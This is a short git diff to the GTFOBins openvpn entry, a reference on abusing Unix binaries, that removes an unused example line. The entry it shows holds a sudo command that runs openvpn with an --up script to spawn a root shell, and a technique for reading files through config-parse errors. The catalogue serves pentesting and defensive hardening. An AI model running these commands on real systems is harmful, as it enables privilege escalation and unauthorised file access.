diff --git a/_gtfobins/openvpn.md b/_gtfobins/openvpn.md index 394b8c7..aa02ad2 100644 --- a/_gtfobins/openvpn.md +++ b/_gtfobins/openvpn.md @@ -14,7 +14,6 @@ functions: ./openvpn --config "$LFILE" sudo: - code: | - COMMAND='id' sudo openvpn --dev tun0 --script-security 2 --up '/bin/sh -c sh' - description: The file is actually parsed and the first partial wrong line is returned in an error message. code: |